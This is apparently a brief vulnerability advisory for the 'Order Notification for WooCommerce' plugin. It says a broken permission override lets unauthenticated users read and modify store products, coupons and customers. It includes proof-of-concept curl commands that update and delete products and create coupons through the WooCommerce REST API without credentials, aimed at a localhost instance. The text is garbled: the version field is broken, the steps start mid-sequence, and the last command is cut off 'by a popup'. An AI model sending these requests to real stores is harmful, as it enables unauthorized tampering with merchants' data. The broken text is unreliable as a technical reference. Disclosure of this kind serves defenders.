### Vulnerability Overview This vulnerability exists in the **Order Notification for WooCommerce** plugin. The plugin incorrectly overrides WooCommerce's permission check mechanism, allowing attackers to gain full access to all unauthenticated requests without any authentication. This enables attackers to fully read and write store resources, including products, coupons, and customers. ### Scope of Impact * **Plugin Name:** Order Notification for WooCommerce * **Affected Versions:** ) curl -i -X PUT "http://localhost:10005/wp-json/wc/v3/products/" -H "Content-Type: application/json" --data '{"regular_price"... # 4) Delete the created product (replace ) curl -i -X DELETE "http://localhost:10005/wp-json/wc/v3/products/?force=true" # 5) Create a coupon without authentication curl -i -X ... (partially obscured by a popup) ```